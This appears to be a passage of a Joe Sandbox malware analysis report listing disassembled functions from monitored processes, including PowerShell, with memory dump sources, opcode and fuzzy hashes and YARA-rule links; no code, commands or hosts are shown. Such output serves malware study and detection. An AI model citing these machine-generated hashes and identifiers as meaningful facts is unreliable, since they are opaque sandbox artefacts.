                                                                                                                                                                      • String ID: cannot use RETURNING in a trigger$sqlite_returning
                                                                                                                                                                      • API String ID: 817585512-753984552
                                                                                                                                                                      • Opcode ID: 4d71a1ed1be8154145d31cb5655592c581e01f5ea5807a174fc836d0f382942a
                                                                                                                                                                      • Instruction ID: e4ef3b6619eba84eb8c383fc73f03664ca3101754fe117461744b2476bd1842b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d71a1ed1be8154145d31cb5655592c581e01f5ea5807a174fc836d0f382942a
                                                                                                                                                                      • Instruction Fuzzy Hash: 23413936F09B8596E7689B22A1607A973A0FB48B84F444231DFBE47799DF38F461C301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE003185B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$System$File
                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                      • API String ID: 2838179519-1553575800
                                                                                                                                                                      • Opcode ID: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                      • Instruction ID: 0e1e939930c83157943c91ab94fedb5a19ae0b336d68b86f8160f032deef743e
                                                                                                                                                                      • Opcode Fuzzy Hash: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                      • Instruction Fuzzy Hash: 13217172A08686CADB958F29E8102F977E4EB8CB94F449035DB4DC7769EE3CD1418B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00318FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$System$File
                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                      • API String ID: 2838179519-1553575800
                                                                                                                                                                      • Opcode ID: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
                                                                                                                                                                      • Instruction ID: 9d453871ce11815be9b87d8dc368dca2a72d3bcacb993a5819a4cfe02dca72d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D01D6E2B1864582EF61DB29F8015996790FBCC794F449032E75DCBB69EE3CD2458B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFD9AB9A816 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: iS_L
                                                                                                                                                                      • API String ID: 0-1272560476
                                                                                                                                                                      • Opcode ID: a562916d9b3ecfdb30360b186332eda3fdb6ab06df7fcbf6af72b9a3febdff42
                                                                                                                                                                      • Instruction ID: 6edca6eaf9e054c637c863d6b90151afb5c57fd702d61cb69512c43218bb1e2c
                                                                                                                                                                      • Opcode Fuzzy Hash: a562916d9b3ecfdb30360b186332eda3fdb6ab06df7fcbf6af72b9a3febdff42
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F51383160D7854FD74DEB28C8A59707BE0EF9A318B1801FED489CB1A7EA26B843C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB9A83C Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: iS_L
                                                                                                                                                                      • API String ID: 0-1272560476
                                                                                                                                                                      • Opcode ID: 412c3993536af2642ec200fd9638529684a2d7f695b908ff73c8603696b74825
                                                                                                                                                                      • Instruction ID: 8d595f38a0c9682835559624812561289e32e43aeb79ced5eebb2a7790af4277
                                                                                                                                                                      • Opcode Fuzzy Hash: 412c3993536af2642ec200fd9638529684a2d7f695b908ff73c8603696b74825
                                                                                                                                                                      • Instruction Fuzzy Hash: 5741043171CA454FD74CEA1CC495A71B7E0EF9A318B1401BEE48AC72A6EA26FC43C741
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB962E8 Relevance: .8, Instructions: 794COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9ec520116811995fc1fc60c5b4860db762079ea182254b0404bc5906a83beb5f
                                                                                                                                                                      • Instruction ID: 2a8420450dbe221184276448b2f329a278baac788bfd46e5ac090dcb9382b874
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ec520116811995fc1fc60c5b4860db762079ea182254b0404bc5906a83beb5f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C424A26F0C6568FEB58EB9CE4B15E97BA0EFD4369B0441B7D04DCB197DE28A84583C0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB9BD0C Relevance: .7, Instructions: 689COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: acfa8d427b64b7ba136255abf02c85b57f6a7bc109387722c38843a42006025c
                                                                                                                                                                      • Instruction ID: b1b75715e5162505d3126d59197fee6daef89e9a3c02230417a32e98ebec3c86
                                                                                                                                                                      • Opcode Fuzzy Hash: acfa8d427b64b7ba136255abf02c85b57f6a7bc109387722c38843a42006025c
                                                                                                                                                                      • Instruction Fuzzy Hash: E822F531A18A498FDB98DF5CC4A5AA97BE1FF99314F1441BDD04AC7296DA34EC42CB80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AC6682B Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 40e308152216f5d67698af665516409827d284024f8a16bb59eacf33c22bafdd
                                                                                                                                                                      • Instruction ID: f48bc321e76c5598895423239ed91bafad2f254d7b20fcf678754cdc08be8bcc
                                                                                                                                                                      • Opcode Fuzzy Hash: 40e308152216f5d67698af665516409827d284024f8a16bb59eacf33c22bafdd
                                                                                                                                                                      • Instruction Fuzzy Hash: DEC10627B0DA8A0FEB6DEBA898655B97BD0EF55314B0801FEE45DCB1D3DA18A8058341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB9B368 Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 22f8bb23b96d2e0ef40f25fed4ad2fef941e9dfba73e3c9ba41ad1422067c7bc
                                                                                                                                                                      • Instruction ID: 196fa1fa42016a08a978433317768a7752cf6a766aa763ba56a8ee5254cf13ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 22f8bb23b96d2e0ef40f25fed4ad2fef941e9dfba73e3c9ba41ad1422067c7bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 5DB17970A1CB498FE759DF1CC4A5AB5BBE0FF95314F1041BED08AC3296DA25E842CB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AC64228 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9a8b8d5ac0e30f317da697edbb9eea6b36e6c6cc00633bfb20143866d0a283e6
                                                                                                                                                                      • Instruction ID: b284899140a8fcdaa510f44d50bcd204cc646ffd449eaa07436741dd3b9a25e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 9a8b8d5ac0e30f317da697edbb9eea6b36e6c6cc00633bfb20143866d0a283e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 46A12527B0DA8B1FE7AED66C59255B93BD1EF86320B1901FAD05DCB1D7DE18AC028341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AC6452B Relevance: .3, Instructions: 316COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6141bd3108ad8b86f6be87ae664d94e9c935e83b033bcd0d1811afbeda44ef4c
                                                                                                                                                                      • Instruction ID: 8295dc51a9fe306afa62e4af7498debcb7bac5c5639041f5d5237d1a693b9767
                                                                                                                                                                      • Opcode Fuzzy Hash: 6141bd3108ad8b86f6be87ae664d94e9c935e83b033bcd0d1811afbeda44ef4c
                                                                                                                                                                      • Instruction Fuzzy Hash: E0913A37F0DA8A5FE7AAD76859255B87BD1EF86220B0901FBD05DCB1D7DE18AC028341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB99870 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1042080ab48e12130825a5a49f83035fd6c5ee215352c03276c38f5c71b23328
                                                                                                                                                                      • Instruction ID: 7d640e071f9c6b791f7b3f01addf8911c89a1deeddd7fa82c1241f49c28c82c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1042080ab48e12130825a5a49f83035fd6c5ee215352c03276c38f5c71b23328
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E410871A0CB884FDB5C9B5C9C566A97BE0FBA9310F00426FE44DC3252DA71A815CBC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AA7E380 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1769996934.00007FFD9AA7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA7D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9aa7d000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6dc0568b459b2f935d425157d4e8d2f15820524cd33959188f159ab3d9bec8e0
                                                                                                                                                                      • Instruction ID: 705f903313e65c3d26135fb76c749b37ec7605ad95b49663da72b1d235fdea50
                                                                                                                                                                      • Opcode Fuzzy Hash: 6dc0568b459b2f935d425157d4e8d2f15820524cd33959188f159ab3d9bec8e0
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41257190DBC44FE76A8B3898559533FF0EF53328B1905EFD088CB1A3D625A84AC792
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB9A115 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bff09d614203d1aa6829a0419656893ef17016905e86aba55be77180a1c2a742
                                                                                                                                                                      • Instruction ID: f90f91b4099438ce1ed96e1a7819284098b72984691c69092e36137909f733fb
                                                                                                                                                                      • Opcode Fuzzy Hash: bff09d614203d1aa6829a0419656893ef17016905e86aba55be77180a1c2a742
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A31F921E0D2938ED34ABB68A8B11D47B60EF11718B4842F7C45CCF4E7FE2919859399
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AC6429F Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 04e6e284e7d6144464617533b6728f464dff28b4d7d29c1328877776c66c5d15
                                                                                                                                                                      • Instruction ID: eed0271642e5a0705b103a87d81a156e0104c3087ed7237b03032a98975f83db
                                                                                                                                                                      • Opcode Fuzzy Hash: 04e6e284e7d6144464617533b6728f464dff28b4d7d29c1328877776c66c5d15
                                                                                                                                                                      • Instruction Fuzzy Hash: 6221E12BB1EA876FE7BDDA5C566017877C1EF81210B6901FAD05ECF192CE18EC008341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AC6459C Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e9b3054c4a650b2f6b6266b09f955e4020a0c3e5bbf0314ade3732d972b5f1e0
                                                                                                                                                                      • Instruction ID: c19a2d1884af5e4fc722ca8466137b5ce23bb8cbb3f5712cb4bfbefdd96a0deb
                                                                                                                                                                      • Opcode Fuzzy Hash: e9b3054c4a650b2f6b6266b09f955e4020a0c3e5bbf0314ade3732d972b5f1e0
                                                                                                                                                                      • Instruction Fuzzy Hash: B311C137E0E9975FEBB9D6A896746B877D0EF41220B0900FAD05DCF096D919AC008341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
                                                                                                                                                                      • Instruction ID: bf9577e5e9b7b2072d356da8353058d7baefce6c332db351a369143a1c792179
                                                                                                                                                                      • Opcode Fuzzy Hash: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01A73120CB0C4FD748EF0CE051AA5B3E0FB89324F10056DE58AC3695DA32E882CB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9AB9BF88 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f32b39857a1a14495dace93e3fd6f463e273a565427c328810a35c93c17d4367
                                                                                                                                                                      • Instruction ID: ffa5f32b1a8824ee2f8738c3307a3f20c1187fae10b14295a169c9351f7a135a
                                                                                                                                                                      • Opcode Fuzzy Hash: f32b39857a1a14495dace93e3fd6f463e273a565427c328810a35c93c17d4367
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0653271C6058FDB5CAA1CF4529B573D1EB99324B10017EF48BC3297E927F842CA85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFD9AC917D9 Relevance: .8, Instructions: 776COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900890537.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d09165172239c86fcf09f50e2ffd2f94b42fc495788a1711cd9a4b08c3f48a0b
                                                                                                                                                                      • Instruction ID: 67992de08b6f200b8fdeb7ff391e4f7fe2d9d6edfe5f094f0743efddab76f731
                                                                                                                                                                      • Opcode Fuzzy Hash: d09165172239c86fcf09f50e2ffd2f94b42fc495788a1711cd9a4b08c3f48a0b
                                                                                                                                                                      • Instruction Fuzzy Hash: AE323727B0DB894FE7AA976858615B97BE1DF86210B0900FBD09DCB1DBED18AC06C351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC5FF5 Relevance: 3.2, Strings: 2, Instructions: 657COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: >Y_H$K_^
                                                                                                                                                                      • API String ID: 0-1868155288
                                                                                                                                                                      • Opcode ID: 1ab20aed08a5c90fe6c594d36eacff7d9071a8439948f86b66d78e1639e8ec25
                                                                                                                                                                      • Instruction ID: c55020ca9f5d45da333887441256480cebb178fb29dad1a52e6d936b3b719e2d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ab20aed08a5c90fe6c594d36eacff7d9071a8439948f86b66d78e1639e8ec25
                                                                                                                                                                      • Instruction Fuzzy Hash: 80220732B0CA894FDB59EB5CC4B1EE97BF1FFA5314F1501BAD049C7296DA24A842C781
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC53F2 Relevance: 1.8, Strings: 1, Instructions: 556COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: K_^
                                                                                                                                                                      • API String ID: 0-3865075263
                                                                                                                                                                      • Opcode ID: 9c83778fe105ae36a11756507933cdfebef847ba4e468f3c17b14881f2d30c38
                                                                                                                                                                      • Instruction ID: 3789ff3b056611178784650ceaf2905eeeb3e211a623f2a5bed202b3786d593b
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c83778fe105ae36a11756507933cdfebef847ba4e468f3c17b14881f2d30c38
                                                                                                                                                                      • Instruction Fuzzy Hash: 9202E732B0C94A4FEB54FB9CE4A5AE97BB1FF94314F0543B6D049C7197DA24A846C780
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC4BED Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ^
                                                                                                                                                                      • API String ID: 0-1590793086
                                                                                                                                                                      • Opcode ID: c852722e836a3775dab5ea61b56726488a2b786aec63be5fedd22cef6bab5fc9
                                                                                                                                                                      • Instruction ID: a362699eee3ae8a28f5e4aa00568c5651568c15a4d1989d96b65c469d570bdc8
                                                                                                                                                                      • Opcode Fuzzy Hash: c852722e836a3775dab5ea61b56726488a2b786aec63be5fedd22cef6bab5fc9
                                                                                                                                                                      • Instruction Fuzzy Hash: 46E13A33F0E6864FE719ABAC98655E97FB0EF86314F0942FBD099871A3DD256806C341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD9ABC6155 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
